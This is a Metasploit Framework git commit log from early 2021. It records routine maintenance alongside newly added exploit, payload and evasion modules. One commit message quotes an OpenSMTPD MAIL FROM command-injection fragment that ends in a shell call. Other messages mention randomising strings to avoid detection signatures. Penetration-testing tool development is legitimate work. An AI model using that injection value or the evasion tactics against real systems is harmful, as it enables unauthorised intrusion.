Brendan Coles debe4242c9 Land #14725, Move Zyxel credentials to routers_userpass.txt 2021-02-06 01:05:39 +00:00
h00die 60cf48c94b move cve-2020-29583 to a better file 2021-02-05 17:43:34 -05:00
Metasploit 21d734d576 automatic module_metadata_base.json update 2021-02-05 15:08:35 -06:00
Spencer McIntyre b4dd46a8de Land #14721, sudo_baron_samedit: Add target: Debian 10 x64, sudo v1.8.27, libc v2.28 2021-02-05 16:01:58 -05:00
Metasploit d9cf39cf32 automatic module_metadata_base.json update 2021-02-05 12:30:24 -06:00
Shelby Pace fc8ed5ba4e Land #14154, use prepend autocheck 2021-02-05 12:22:38 -06:00
Shelby Pace 606c6561a0 remove manual ForceExploit check in emacs_movemail 2021-02-05 12:15:44 -06:00
Metasploit db2ff9a0e0 automatic module_metadata_base.json update 2021-02-05 11:25:24 -06:00
Tim W f3eafc22a2 Land #14685, linux/x64/shell_bind_tcp_random_port improvements 2021-02-05 17:14:50 +00:00
Metasploit 25dbd8969f automatic module_metadata_base.json update 2021-02-05 10:31:15 -06:00
adfoster-r7 b3da14e66b Land #14669, ensure selected cracker is available and viable 2021-02-05 16:24:59 +00:00
Jeffrey Martin cce7dfb55f correction to error message grammar 2021-02-05 08:50:37 -06:00
dwelch-r7 4c43a8081a Land #14480, Improve handling of external modules when missing runtime dependencies 2021-02-05 13:51:11 +00:00
adfoster-r7 0b18de5a3d Land #14720, Fix missing vhost in rhost http url feature 2021-02-05 10:41:37 +00:00
Brendan Coles cfda83df99 sudo_baron_samedit: Add target: Debian 10 x64, sudo v1.8.27, libc v2.28 2021-02-05 07:54:34 +00:00
Metasploit e05a6fd568 Bump version of framework to 6.0.30 2021-02-04 13:31:26 -06:00
Metasploit 645b4f48f5 automatic module_metadata_base.json update 2021-02-04 11:13:25 -06:00
bwatters 434c54da33 Land #14715, CVE-2021-3156 Sudo LPE (AKA: Baron Samedit)
Merge branch 'land-14715' into upstream-master
2021-02-04 11:06:30 -06:00
Metasploit 858c958a2d automatic module_metadata_base.json update 2021-02-04 11:02:47 -06:00
Shelby Pace 87af571107 Land #14578, add wp abandoned cart sqli 2021-02-04 10:56:12 -06:00
dwelch-r7 3b8d87bdcb Fix missing vhost in rhost http url feature 2021-02-04 16:52:43 +00:00
Shelby Pace 4c4df29f25 change vulnerable version number 2021-02-04 10:50:13 -06:00
Adam Cammack f08b18a48f Land #14719, Bump rex-core to 0.1.15
Grabs rapid7/rex-core#12, Fix read/write/close race on streams
2021-02-04 10:02:59 -06:00
Adam Cammack f98e9df2bd Bump rex-core
*  Land #12, Fix read/write/close race on streams
2021-02-04 09:58:29 -06:00
Spencer McIntyre 504865d507 Add a target for Ubuntu 18.04 and setgid and setuid by default 2021-02-04 10:45:00 -05:00
Spencer McIntyre 7281d00938 Implement feedback from PR review 2021-02-04 09:25:40 -05:00
Spencer McIntyre c33c08bae9 Add a check method using the version information 2021-02-03 18:16:13 -05:00
Spencer McIntyre c590d7b1bb Add module docs and be more permissive with Length formatting 2021-02-03 18:16:13 -05:00
Spencer McIntyre b31aa023da Don't check the regex when the value is nil 2021-02-03 18:16:13 -05:00
Spencer McIntyre 117cdc4fd7 Populate module metadata and cleanup files 2021-02-03 18:16:13 -05:00
Spencer McIntyre a00f165b6b Clean the C code and fix the exploitation environment 2021-02-03 18:16:13 -05:00
Spencer McIntyre b9413b4103 Update the exploit C code to allocate it's own PTY 2021-02-03 18:16:13 -05:00
Spencer McIntyre 13dd9ac10e Initial work on CVE-2021-3156 2021-02-03 18:16:13 -05:00
Grant Willcox 8eb75b0c13 Land #14713, Add documentation for auxiliary/scanner/redis/redis_login 2021-02-03 10:47:22 -06:00
Grant Willcox 7f31ac9f2b Fix up issues in review so this can be landed 2021-02-03 10:44:59 -06:00
A Galway 4f2d34a09d Land #14684, format logs to python modules 2021-02-03 15:54:15 +00:00
Alan Foster 8b0b5c31fe Update sqlite3 version 2021-02-03 14:15:09 +00:00
yogeshwarram 54f76fba21 Update redis_login.md 2021-02-03 15:29:02 +05:30
Christophe De La Fuente eaa550fa97 Changes compiler subsystem to window 2021-02-02 17:57:52 +01:00
Grant Willcox c392fec9c9 Land #14707, Update bot label comments 2021-02-02 09:33:53 -06:00
cgranleese-r7 98349a6823 Improve handling of external modules when missing runtime dependencies 2021-02-02 14:49:16 +00:00
adfoster-r7 a38744a23c Land #14693, Revert "Fix bug where vhost wasn't being set correctly when using rhost http url" 2021-02-02 14:43:04 +00:00
Alan Foster 819e4782d2 Update bot label comments 2021-02-02 14:25:34 +00:00
cgranleese-r7 3a2932b798 Migrate old uses of manual autocheck to use the new prepend autocheck 2021-02-02 10:15:46 +00:00
yogeshwarram 664feb8c8d Documentation for auxiliary/scanner/redis/redis_login module.
This commit adds a documentation for auxiliary/scanner/redis/redis_login module.
2021-02-02 14:04:56 +05:30
Jeffrey Martin 2db217aac8 remove action set no longer required 2021-02-01 14:16:13 -06:00
Metasploit 59aa6eab85 automatic module_metadata_base.json update 2021-02-01 13:52:26 -06:00
Spencer McIntyre f405f25b38 Land #14690, bump Gemfile.lock and metasploit-framework.gemspec to use mettle 1.0.6 2021-02-01 14:45:59 -05:00
Alan Foster e0653f271f Ensure external python modules have formatted logging 2021-02-01 17:42:49 +00:00
Tim W 4a68ef17fd update mettle payload cached sizes 2021-02-01 11:50:35 -05:00
dwelch-r7 8f83de865c Revert "Fix bug where vhost wasn't being set correctly when using rhost http url" 2021-02-01 16:33:18 +00:00
Tim W 42c901efea bump Gemfile.lock and metasploit-framework.gemspec to use mettle 1.0.6 gem 2021-02-01 10:53:28 -05:00
Jeffrey Martin c49719d599 Land #14691, Bump msgpack dependency 2021-02-01 09:16:18 -06:00
Alan Foster 3c82538d70 Bump msgpack dependency 2021-02-01 15:06:55 +00:00
RAMELLA Sébastien 846f5be936 fix. rubocop -a. 2021-02-01 10:25:18 +04:00
RAMELLA Sébastien f21e3c2386 fix. typo. 2021-02-01 09:55:56 +04:00
Pedro Ribeiro 90f8c1f7b9 add tested for 2019.11 too 2021-01-30 21:54:48 +07:00
Pedro Ribeiro 33edfaa8f6 mention that it has been tested on 2019.11 too 2021-01-30 21:47:31 +07:00
Grant Willcox 6cfe411f53 Land #14665, Bump msf-payloads Gem from 2.0.27 to 2.0.28 2021-01-29 17:12:08 -06:00
Geyslan G. Bem ab307fbd87 payload/x64: shell_bind_tcp_random_port improvement
This patch reduces the payload to 52 bytes while preserving its functionality
using coordinated xchg instructions.
It also guarantees dup2 call without garbage in rax.

Signed-off-by: Geyslan G. Bem <geyslan@gmail.com>
2021-01-29 16:58:14 -03:00
k0pak4 d7197d723a Add back in verify=False on service verification 2021-01-29 13:29:26 -05:00
Metasploit 4f7417d91d automatic module_metadata_base.json update 2021-01-29 11:37:33 -06:00
Grant Willcox 90d9a5dcff Land #14682, Fix msftidy warnings 2021-01-29 11:30:52 -06:00
Metasploit 1619f8333d automatic module_metadata_base.json update 2021-01-29 10:26:49 -06:00
Grant Willcox a8b1bf17d0 Land #14593, OneDrive Sync Targets Enumeration Module 2021-01-29 10:20:01 -06:00
Grant Willcox 0a5646d59b Fix minor msftidy_docs.rb error 2021-01-29 10:19:33 -06:00
Alan Foster 91febcb194 Fix msftidy warnings 2021-01-29 16:19:13 +00:00
Grant Willcox fce3cf2ba2 Add in documentation updates and improve some areas of the module to remove false statements and clean up output and code styling 2021-01-29 10:17:48 -06:00
Metasploit eda9168e8b automatic module_metadata_base.json update 2021-01-29 08:57:27 -06:00
Jeffrey Martin 823aeb2d58 Land #14681, Ensure msftidy runs on ci 2021-01-29 08:50:11 -06:00
Jeffrey Martin 50b3a4c73a Land #14679, Remove < character from Archive_Tar exploit module 2021-01-29 08:49:00 -06:00
Alan Foster 7cb8876e92 Ensure msftidy runs on ci 2021-01-29 12:29:15 +00:00
Tim W 800a1cf5be add more offsets for safari_proxy_object_type_confusion 2021-01-29 12:23:13 +00:00
Metasploit d5a7e05533 automatic module_metadata_base.json update 2021-01-29 05:53:06 -06:00
Pedro Ribeiro 137664818d add obm windows privesc sploit 2021-01-29 18:45:33 +07:00
Brendan Coles 9beec65ef3 Land #14680, winrm_script_exec: print command output unless output is nil 2021-01-29 11:45:33 +00:00
Alan Foster e0ab259880 Remove < character from Archive_Tar exploit module 2021-01-29 11:20:50 +00:00
Robin Wood 89f4d3e2d7 Fix for issue #14678
Stops the printing of a rogue nil when exploit completes.

See https://github.com/rapid7/metasploit-framework/issues/14678
2021-01-29 11:17:38 +00:00
Metasploit f23c5b53d6 Bump version of framework to 6.0.29 2021-01-28 17:41:54 -06:00
Grant Willcox ff25fc2510 Land #14674, Add explicit require for open3 dependency to managed_remote_data_service.rb 2021-01-28 13:25:20 -06:00
Christophe De La Fuente ea805b135d Remove markdown and fix numbering in module Description 2021-01-28 20:04:48 +01:00
Christophe De La Fuente 4b3379a821 Remove CRT library from the Template 2021-01-28 19:59:46 +01:00
Alan Foster 0682780636 Add explicit require for open3 dependency 2021-01-28 18:41:31 +00:00
Stuart.Morgan 58f5fba22d Run rubocop 2021-01-28 15:56:48 +00:00
Stuart.Morgan 8e0bcabaa8 Added more verbose account checks as per gwilcox's request 2021-01-28 15:54:06 +00:00
Pedro Ribeiro b8fe5fabf8 fix typo another typo 2021-01-28 22:50:05 +07:00
Pedro Ribeiro 446316ef6c fix typo at the end of app list 2021-01-28 22:49:32 +07:00
Pedro Ribeiro 7d9eb1e88b fix typo on LWSSO_COOKIE_KEY 2021-01-28 22:45:04 +07:00
Grant Willcox 9dcd9f0cc2 Land #14432, Save windows hash to database 2021-01-28 09:02:43 -06:00
Pedro Ribeiro dcd9a6a214 add more clarification regarding affected products 2021-01-28 20:41:08 +07:00
Pedro Ribeiro 7ea5c3ffce add clarification about c3p0 2021-01-28 18:23:20 +07:00
Pedro Ribeiro c73fa70543 do the rubocop thing and add docs 2021-01-28 18:21:51 +07:00
Pedro Ribeiro a5725b823a add sploit 2021-01-28 17:41:06 +07:00
Pedro Ribeiro 478ebb0df9 Merge pull request #27 from rapid7/master
ffff
2021-01-28 16:21:17 +07:00
Grant Willcox 760e4f6880 Add in first round of fixes for review comments 2021-01-27 16:54:24 -06:00
Metasploit 2f074ef587 automatic module_metadata_base.json update 2021-01-27 15:56:25 -06:00
bwatters 9174958489 Land #14627, Add PRTG Network Monitor RCE (CVE-2018-9276)
Merge branch 'land-14627' into upstream-master
2021-01-27 15:48:27 -06:00
Jeffrey Martin 6f7f1db6f9 ensure selected cracker is available and viable
When no password cracker is installed `cracker_version` returns `nil`.
Guard against `nil` in the version check and consolidate detection of
a viable environment and application as a responsibility of the factory
that provides the instance.
2021-01-27 14:28:08 -06:00
Grant Willcox 8074e8676b Land #14667, Add Ruby 3.0.0 issue bot response. 2021-01-27 13:47:14 -06:00
Alan Foster 4842ea2183 Add ruby 3.0.0 issue bot response 2021-01-27 17:08:45 +00:00
Grant Willcox e8080b343b Bump Gemfile.lock and metasploit-framework.gemspec to use metasploit-payloads gem version 2.0.28 2021-01-27 10:31:36 -06:00
Metasploit 7f162b3504 automatic module_metadata_base.json update 2021-01-27 10:23:10 -06:00
Grant Willcox bcb9b7171c Land #14664, Hide negative/missed results behind vprint_error within auxiliary/scanner/ssh/ssh_enumusers 2021-01-27 10:15:23 -06:00
Grant Willcox cd1f0780de Fix up a minor typo. 2021-01-27 10:14:52 -06:00
Metasploit 22d768f6bf automatic module_metadata_base.json update 2021-01-27 09:07:52 -06:00
Spencer McIntyre 74898461b4 Land #14654, Add exploit for Micro Focus UCMDB unauthenticated RCE 2021-01-27 10:00:22 -05:00
Spencer McIntyre fc6957fbf6 Fix a couple of issues in the markdown formatting 2021-01-27 10:00:02 -05:00
Sebastian Tauchert edde3b8fa2 Hide negative results as default 2021-01-27 15:16:55 +01:00
k0pak4 12586e4f88 Add user_agent variable in order to circumvent systems that rely on particular user agents 2021-01-26 20:38:22 -05:00
Geyslan G. Bem 4ed8bd8052 payloads/x86/exec.rb - new NullFreeVersion advanced option
This patch adds the OptBool NullFreeVersion advanced option.

Its default value is false. When set as true, generate will output a
self included null-free version of the payload without need of encoding.

Signed-off-by: Geyslan G. Bem <geyslan@gmail.com>
2021-01-26 14:24:03 -03:00
Geyslan G. Bem 34223874b6 payloads/x86/exec.rb - metasm, refactoring
This patch converts shellcode to metasm and adds new behaviour to CMD option.

Now if CMD is empty or unset, a 20 byte not null-free execve payload is build.
The arbitrary command option continues the same when CMD is set.

Signed-off-by: Geyslan G. Bem <geyslan@gmail.com>
2021-01-26 11:09:25 -03:00
adfoster-r7 10a3c12c04 Land #14659, Rubocop: Layout/ExtraSpacing: Enable AllowBeforeTrailingComments 2021-01-26 00:36:49 +00:00
Brendan Coles 19b9bdbbf5 Rubocop: Layout/ExtraSpacing: Enable AllowBeforeTrailingComments 2021-01-26 00:08:08 +00:00
Grant Willcox f4bfbf5c29 Apply fixes from Spencer's review 2021-01-25 16:36:57 -06:00
bwatters 5dafb52922 Land #14564, Switch to using mod parameter for tab completion
Merge branch 'land-14564' into upstream-master
2021-01-25 14:57:20 -06:00
Metasploit d59241cf01 automatic module_metadata_base.json update 2021-01-25 14:14:32 -06:00
Spencer McIntyre 20590e91fb Land #14541, Create fanny_bmp_check.rb 2021-01-25 15:08:22 -05:00
Spencer McIntyre 3cd65606ee Update the fanny_bmp_check module and documentation 2021-01-25 14:54:44 -05:00
William Martens 4445812b60 Create fanny_bmp_check.rb
Update modules/post/windows/gather/forensics/fanny_bmp_check.rb

Thanks, I thought the comments on it would be needed/ (this is my first module)

Co-authored-by: bcoles <bcoles@gmail.com>

Update modules/post/windows/gather/forensics/fanny_bmp_check.rb

[+] thanks!

Co-authored-by: bcoles <bcoles@gmail.com>

Update modules/post/windows/gather/forensics/fanny_bmp_check.rb

Co-authored-by: bcoles <bcoles@gmail.com>

Update modules/post/windows/gather/forensics/fanny_bmp_check.rb

Co-authored-by: bcoles <bcoles@gmail.com>

Update modules/post/windows/gather/forensics/fanny_bmp_check.rb

[+] thanks for the sharp eye! It certainly does. I tried at my side to make it look as a "flow" but never really succeeded with it. Again, thanks!

Co-authored-by: bcoles <bcoles@gmail.com>

Update modules/post/windows/gather/forensics/fanny_bmp_check.rb

Co-authored-by: bcoles <bcoles@gmail.com>

Update modules/post/windows/gather/forensics/fanny_bmp_check.rb

Of course, this is my first module - I'm sorry, thanks for pointing it out!

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>

Update fanny_bmp_check.rb

Changed
 ...on #{sysinfo['Computer']} for...
to
"Target #{match} result(s) found in
And as well as the + 'shell'  in the session types.
And, as well as  commented some stuff I will remove (the comments, that is) when this is done.
The URL (ref) at the Desc. of the module needs to be a bit more short. Will do this too.

Changed (if not already?) the src link.

Create fanny_bmp_check_Docs.md

Rename fanny_bmp_check_Docs.md to fanny_bmp_check.md

Docs ready to go, (msftidy_docs done[x])

 ./tools/dev/msftidy_docs.rb documentation/modules/post/windows/gather/forensics/fanny_bmp_check.md
(no results) - so It's ready to go

msftidy.rb Done [no errors)

msftidy.rb Done [no errors)

Update fanny_bmp_check.md

Update fanny_bmp_check.md

Removed References since they were not (really) meant for being included,  It was more of my own Notes/Comments that accidentally came with it. 👍

Indentation (2 spaces, + the 33 to 44 lineblock fixed[x])

Update modules/post/windows/gather/forensics/fanny_bmp_check.rb

Co-authored-by: bcoles <bcoles@gmail.com>

fanny_bmp_check.rb

Updated fanny_bmp_check.rb to use arrays instead.

Update fanny_bmp_check.rb

Rubocop fixed

Update fanny_bmp_check.rb

Added report_vuln()  as Jmartin suggested

Update fanny_bmp_check.rb

Update v2

Update modules/post/windows/gather/forensics/fanny_bmp_check.rb

Oh,  yes -  Thank you,  again - sorry

Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>

Sorry for confusion; 2 problems(line 66+line 61) (work arounded for now)

2 Problems, first; it did not work with the info line (line 66, 61)
If It's still wrong ( the loop , which I have tried to fix)

I am not entirely sue what the problem is, because If I had the end there it was (commented out, line 61) - then it gets, unexpected 'end'  expecting end-of-input,

Coming back again, sorry for the confusion.

Update modules/post/windows/gather/forensics/fanny_bmp_check.rb

Ah, tried it over here - and it worked,  Thanks!

Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>

Update documentation/modules/post/windows/gather/forensics/fanny_bmp_check.md

Of course,  thanks, committing this suggestion.

Regards

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>

Update modules/post/windows/gather/forensics/fanny_bmp_check.rb

Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
2021-01-25 14:54:37 -05:00
adfoster-r7 c4626ea736 Land #14657, download version of get-pip supporting python2 2021-01-25 17:10:55 +00:00
Jeffrey Martin 51fdde6806 download version of get-pip supporting python2
As of Jan 30, the latest version of get-pip provides
pip 21.0+ and no longer supports python2 syntax.  By
pulling down the locked version directly from github
instead of latest from pypi the requirement to only
support python3 is deferred.
2021-01-25 09:59:56 -06:00
Pedro Ribeiro 191e772f06 fix issues highlighted by smcintyre-r7 2021-01-25 22:25:07 +07:00
Metasploit 07ae6acc8e automatic module_metadata_base.json update 2021-01-25 06:31:06 -06:00
adfoster-r7 f3ac5a9718 Land #14650, local_exploit_suggester: Use session.session_host rather than rhost 2021-01-25 12:25:24 +00:00
Metasploit f648256f21 automatic module_metadata_base.json update 2021-01-25 06:18:54 -06:00
adfoster-r7 ba730d5c3c Land #14618, Add exploit for CVE-2020-28949: Archive_Tar PEAR plugin arbitrary file write 2021-01-25 12:12:12 +00:00
Metasploit 807f6fd0d5 automatic module_metadata_base.json update 2021-01-25 05:23:58 -06:00
adfoster-r7 ffd59c3254 Land #14651, msftidy: Add check for module description 2021-01-25 11:17:39 +00:00
Pedro Ribeiro fc0e221f5a add comment for self removal 2021-01-24 22:47:47 +07:00
Pedro Ribeiro 7220dc3ff6 add new note on broken payloads 2021-01-24 22:39:01 +07:00
Pedro Ribeiro 12157163f7 Merge branch 'obm_deser' into ucmdb 2021-01-24 22:25:57 +07:00
Pedro Ribeiro bf4ac7b1a8 add UCMDB sploit 2021-01-24 22:25:45 +07:00
Pedro Ribeiro ca0bb8507d Merge pull request #26 from rapid7/master
sasas
2021-01-24 22:24:24 +07:00
三米前有蕉皮 1cd86bb682 Update lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2021-01-23 16:45:16 +08:00
Brendan Coles b5d746cc44 msftidy: Add check for module description 2021-01-22 23:29:16 +00:00
Metasploit 06f84b0547 automatic module_metadata_base.json update 2021-01-22 17:02:44 -06:00
Spencer McIntyre 17b99983d9 Land #14645, Add MobileIron CVE-2020-15505 exploit 2021-01-22 17:56:35 -05:00
William Vu 39b7ba584e Randomize strings
Spencer tells me not to signature-bait, at least not so obviously. ;)
2021-01-22 16:15:16 -06:00
Brendan Coles f45ca6d045 local_exploit_suggester: Use session.session_host rather than rhost 2021-01-22 22:00:30 +00:00
Metasploit 2c944f498d automatic module_metadata_base.json update 2021-01-22 15:21:01 -06:00
Grant Willcox 72ef81d8aa Land #14640, rubocop -a modules/exploits/unix/local/ 2021-01-22 15:13:58 -06:00
Grant Willcox 0ec99c03f9 Clean up documentation formatting a little bit 2021-01-22 14:27:57 -06:00
k0pak4 b962f410c9 Update module to do service verification by checking for RD Web presence 2021-01-22 15:19:45 -05:00
Grant Willcox 940042ecbb Land #14647, Fix run command tab completions by using the correct value 2021-01-22 13:44:57 -06:00
Grant Willcox 57bb3fbc1c Land #14383, Add exploit and auxiliary Python module examples and update executable loader accordingly 2021-01-22 13:03:57 -06:00
Grant Willcox 7473d0ca56 Add in missing command parameter to exploit.py, should be good to land now 2021-01-22 12:33:03 -06:00
Christophe De La Fuente 8af5ee8a32 Add Process Herpaderping evasion module and binaries 2021-01-22 18:33:10 +01:00
Grant Willcox 7b7bdff1cc Relocate the check to not load the example modules from base.rb loader to the executable loader 2021-01-22 11:07:14 -06:00
Spencer McIntyre f3746be8c6 Fix tab completions by using the correct value 2021-01-22 11:45:03 -05:00
Metasploit 772f98a7dc automatic module_metadata_base.json update 2021-01-22 08:27:42 -06:00
adfoster-r7 ff6a1f135c Land #14629, migrate msf folder to Zeitwerk 2021-01-22 14:21:26 +00:00
dwelch-r7 0301b95597 Add require 'msfenv' to msfdb script 2021-01-22 14:01:18 +00:00
dwelch-r7 1f679d565d Replace the comments from vore.rb and base.rb with readmes 2021-01-22 12:50:29 +00:00
William Vu 00cbc33ebb Add module doc 2021-01-22 01:06:14 -06:00
William Vu 0d410f32c3 Add MobileIron CVE-2020-15505 exploit 2021-01-22 00:37:07 -06:00
Grant Willcox f3990d8bd7 Remove the SHA1 additions as we can't make them work at this point in time 2021-01-21 17:01:12 -06:00
Alan Foster ad8891dff6 Switch to using mod parameter for tab completion 2021-01-21 22:59:36 +00:00
Metasploit 7157e6dd92 automatic module_metadata_base.json update 2021-01-21 16:35:03 -06:00
Grant Willcox 6c34ab76bb Land #14643, wordpress_ghost_scanner: Update reference URLs 2021-01-21 16:27:59 -06:00
Grant Willcox b3c1eb4ae8 Change variable name from invalid_password to empty_password as technically its still a valid password, its just empty. 2021-01-21 16:08:43 -06:00
Grant Willcox 6b2e5497aa Resolve merge conflict 2021-01-21 15:26:09 -06:00
Grant Willcox be9291a85f Update kiwi.rb library to now properly handle saving credentials to the creds database when running creds_msv and also reduce some code reuse by putting reused code into functions 2021-01-21 15:22:40 -06:00
Grant Willcox bd71c16a18 Update the identify.rb library to properly identify other SHA1 hashes as raw-sha1 2021-01-21 15:21:13 -06:00
Brendan Coles abb0decc7a wordpress_ghost_scanner: Update reference URLs 2021-01-21 20:51:29 +00:00
Metasploit bc4216f2c4 Bump version of framework to 6.0.28 2021-01-21 14:04:42 -06:00
Brendan Coles 70bb693660 rubocop -a modules/exploits/unix/local/ 2021-01-21 19:59:29 +00:00
Metasploit a8213b73a9 automatic module_metadata_base.json update 2021-01-21 12:45:57 -06:00
bwatters 1ad7ae2707 Land #14621, Refactor (reduce) linux/x64/shell_bind_tcp_random_port
Merge branch 'land-14621' into upstream-master
2021-01-21 12:38:53 -06:00
Julien Bedel b9800b087f Change notification name
From "Exploit" to a random alphanumeric String in order to make it less fingerprintable.

Co-authored-by: acammack-r7 <adam_cammack@rapid7.com>
2021-01-21 18:32:05 +01:00
Metasploit 4bb2d307ad automatic module_metadata_base.json update 2021-01-21 11:22:51 -06:00
Spencer McIntyre 6d17add62b Land #14637, Clean up exploit/unix/smtp/opensmtpd_mail_from_rce 2021-01-21 12:16:12 -05:00
William Vu 7ce10f68ae RuboCop for great justice
And update docs.
2021-01-21 10:44:18 -06:00
Metasploit 9ef5084edb automatic module_metadata_base.json update 2021-01-21 08:18:05 -06:00
Spencer McIntyre df8c7829af Land #14632, Fix opensmtpd mail from RCE payload failing to trigger 2021-01-21 09:10:14 -05:00
Spencer McIntyre 131bf632bd Update the OpenSMTPD target versions and add the EDB reference 2021-01-21 09:09:42 -05:00
William Vu a336ee483a Update exploit/unix/smtp/opensmtpd_mail_from_rce
Failure was caused by POSIX read requiring an argument.
2021-01-21 03:56:19 -06:00
三米前有蕉皮 e3eaa2b707 Update lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb
Co-authored-by: Grant Willcox <63261883+gwillcox-r7@users.noreply.github.com>
2021-01-21 08:57:05 +08:00
cn-kali-team 74d95d3222 Undo rubicop 2021-01-20 12:22:37 -06:00
cn-kali-team c8e54e87a5 Check ntlm separately 2021-01-20 12:22:37 -06:00
cn-kali-team 36f3b35c6e Add lowercase conversion to check whether the database is activated 2021-01-20 12:22:36 -06:00
cn-kali-team 39b84b826b check framework 2021-01-20 12:22:36 -06:00
cn-kali-team 8195eba447 for hashdump 2021-01-20 12:22:35 -06:00
cn-kali-team 4f9ed925dd for kiwi 2021-01-20 12:22:29 -06:00
Grant Willcox 21f8c7d7dd Land #14635, Fix #14261 Prompt timestamp escape display error 2021-01-20 11:37:05 -06:00
Chris Higgins e9c225aa49 Remove pry-byebug 2021-01-20 11:11:42 -06:00
dwelch-r7 461afdb694 Remove redundant comment 2021-01-20 12:15:03 +00:00
Chris Higgins 273027845e Fix #14261 Prompt timestamp escape display error 2021-01-19 17:50:50 -06:00
Grant Willcox 1dd7a14161 Apply minor fixes to documentation for compliance and clarity 2021-01-19 16:05:43 -06:00
Grant Willcox 0fc8df31f2 Land #14609, Fix bug where vhost wasn't being set correctly when using rhost http url 2021-01-19 11:10:50 -06:00
Grant Willcox 6e326d6a60 Fix up confusing variable name and a typo as pointed out during review 2021-01-19 09:25:56 -06:00
Metasploit 2d7b3b944f automatic module_metadata_base.json update 2021-01-19 08:26:18 -06:00
Spencer McIntyre 3ee642a589 Land #14597, gather/external_ip: set Host header 2021-01-19 09:19:48 -05:00
dwelch-r7 2d9e25d431 Add test case for vhost priority 2021-01-19 14:09:45 +00:00
adfoster-r7 2741b5fca8 Land #14633, Rename shared example files to remove warnings 2021-01-19 13:07:44 +00:00
dwelch-r7 39b34e433e Re-add base folder and missing contents from core.rb to msf.rb 2021-01-19 13:07:05 +00:00
dwelch-r7 8ce8455f34 Re-add base folder and missing contents from core.rb to msf.rb 2021-01-19 12:59:13 +00:00
dwelch-r7 2eb5208ae0 Rename shared example files to remove warnings 2021-01-19 12:32:58 +00:00
adfoster-r7 8027ae1f3e Land #14630, add zyxel hardcoded creds - cve-2020-29583 2021-01-19 12:06:43 +00:00
dwelch-r7 39401db2bf Re-add msf/core file for pro 2021-01-19 12:04:40 +00:00
zomfg-zombie 364591069c Fix payload failing to trigger
For whatever reason,  `;for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;` causes an issue with the payload triggering.

Editing `do read` to `do read r`, as taken from the PoC script at https://www.exploit-db.com/exploits/48051, causes the `MAIL_FROM` field to exceed 64 characters.

However, this seems to make 0 difference to the payload, so I commented out the length check.

Reliably working on OpenSMTPd 6.6.0 on an Ubuntu 20.04 host.
2021-01-19 18:31:35 +10:00
dwelch-r7 8cede7de35 Remove redundant folder inclusion 2021-01-18 15:49:21 +00:00
cgranleese-r7 d5204cf68f Land #14583, Add check for nmap requiring sudo permissions 2021-01-18 15:31:40 +00:00
dwelch-r7 da50c257b5 Fix typo in regex 2021-01-18 15:07:49 +00:00
h00die c3a58f93ec cve-2020-29583 2021-01-18 09:52:09 -05:00
h00die ea4cade5c8 cve-2020-29583 2021-01-18 09:49:53 -05:00
dwelch-r7 a855a39dd6 Refactor msf/scripts away 2021-01-18 14:30:59 +00:00
dwelch-r7 fc4a7fecb3 fix eager loading 2021-01-18 14:21:54 +00:00
dwelch-r7 d6896dadc0 remove msf folder requires 2021-01-18 14:21:54 +00:00
dwelch-r7 d437a32374 remove msf/util requires 2021-01-18 14:21:54 +00:00
dwelch-r7 b816373b94 remove msf/ui requires 2021-01-18 14:21:54 +00:00
dwelch-r7 319e718a95 zeitwerk lib/msf folder, eager loading works 2021-01-18 14:20:57 +00:00
kalba-security f3eb708985 move file permissions checks to favorite_add and favorite_del, print help banner when user input is invalid, do not use parse 2021-01-18 08:38:42 -05:00
Metasploit f6865a93f8 automatic module_metadata_base.json update 2021-01-18 07:17:40 -06:00
adfoster-r7 da7a51fbca Land #14584, implement the zeitwerk autoloader within lib/msf/base 2021-01-18 13:11:08 +00:00
dwelch-r7 122acc4285 Tidy up redundant comments 2021-01-18 12:18:36 +00:00
JulienBedel 8f6dd43025 Add documentation 2021-01-18 12:02:46 +01:00
JulienBedel 14f24b258d Add PRTG Network Monitor RCE (CVE-2018-9276) 2021-01-18 12:01:44 +01:00
Paul Werther 10b29b8e87 add mssql_exec_oacreate module 2021-01-17 17:15:46 +01:00
Geyslan G. Bem d0cf0ef0e9 get rid of tabs
Signed-off-by: Geyslan G. Bem <geyslan@gmail.com>
2021-01-17 11:18:59 -03:00
Geyslan G. Bem 5edb4cd135 reduce to 53 bytes and refactor to embed nasm
Signed-off-by: Geyslan G. Bem <geyslan@gmail.com>
2021-01-17 11:11:07 -03:00
Grant Willcox 95d3bd98ac Do msftidy_docs and rubocop changes 2021-01-15 18:10:23 -06:00
Grant Willcox 2f0abe4900 Add in documentation and fix up small issues with module 2021-01-15 18:06:07 -06:00
Grant Willcox 65370a6b47 Initial module code 2021-01-15 16:20:06 -06:00
Shelby Pace 560327deba Land #14616, fix typo in autoroute.md 2021-01-15 15:43:50 -06:00
Metasploit 4049c41ac1 automatic module_metadata_base.json update 2021-01-15 12:21:17 -06:00
Christophe De La Fuente c8819259ae Land #14414, CVE-2020-1337 - patch bypass for CVE-2020-1048 2021-01-15 19:13:14 +01:00
bwatters 9beb570ca3 Remove unnecessary require that broke things 2021-01-15 08:32:05 -06:00
chenxiaotian e2e3cc12b0 Update autoroute.md 2021-01-15 16:22:33 +08:00
Metasploit 710ed31b75 Bump version of framework to 6.0.27 2021-01-14 12:06:13 -06:00
adfoster-r7 67f99690d8 Land #14613, Fix broken ntlm message constants 2021-01-14 17:51:07 +00:00
Metasploit 38d46c0aeb automatic module_metadata_base.json update 2021-01-14 11:34:22 -06:00
Spencer McIntyre 1e633276e4 Land #14615, Update the metasploit-payloads and mettle gems 2021-01-14 12:14:47 -05:00
Metasploit e9eaf3ba94 automatic module_metadata_base.json update 2021-01-14 10:32:40 -06:00
Grant Willcox f499e1f31f Land #14614, Use an absolute assembly path via File.expand_path() for the CVE-2020-17136 exploit 2021-01-14 10:25:31 -06:00
Spencer McIntyre 65dfaf9453 Update the metasploit-payloads and mettle gems 2021-01-14 10:16:17 -05:00
Spencer McIntyre ea154717aa Use an absolute assembly path for the CVE-2020-17136 exploit 2021-01-14 08:53:11 -05:00
Alan Foster 557623370e Fix broken ntlm message constants 2021-01-14 10:23:57 +00:00
